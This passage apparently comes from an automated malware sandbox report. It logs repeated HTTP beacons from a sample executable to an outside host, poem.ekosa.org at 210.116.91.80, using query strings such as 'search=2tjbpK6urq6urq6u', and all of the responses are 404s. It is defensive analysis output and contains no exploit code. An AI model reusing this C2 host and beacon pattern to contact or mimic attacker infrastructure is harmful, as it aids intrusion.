      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      176192.168.2.449956210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:39.254369020 CET5199OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:39.526974916 CET5200INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:39 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      177192.168.2.449957210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:39.907459021 CET5201OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:40.168960094 CET5201INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:39 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      178192.168.2.449958210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:40.446316004 CET5202OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:40.711049080 CET5203INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:40 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      179192.168.2.449959210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:40.981667042 CET5204OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:41.243006945 CET5204INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:40 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      18192.168.2.449782210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:07.077856064 CET387OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:07.339922905 CET387INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:07 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      180192.168.2.449960210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:41.634579897 CET5205OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:41.895843029 CET5206INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:41 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      181192.168.2.449961210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:42.165972948 CET5206OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:42.428543091 CET5207INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:41 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      182192.168.2.449962210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:42.691966057 CET5208OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:42.950965881 CET5208INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:42 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      183192.168.2.449963210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:43.336865902 CET5209OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:43.599865913 CET5209INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:42 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      184192.168.2.449964210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:43.869934082 CET5210OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:44.131026983 CET5211INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:44 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      185192.168.2.449965210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:44.427678108 CET5211OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:44.690043926 CET5212INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:44 GMT
      Connection: close
      Content-Length: 315
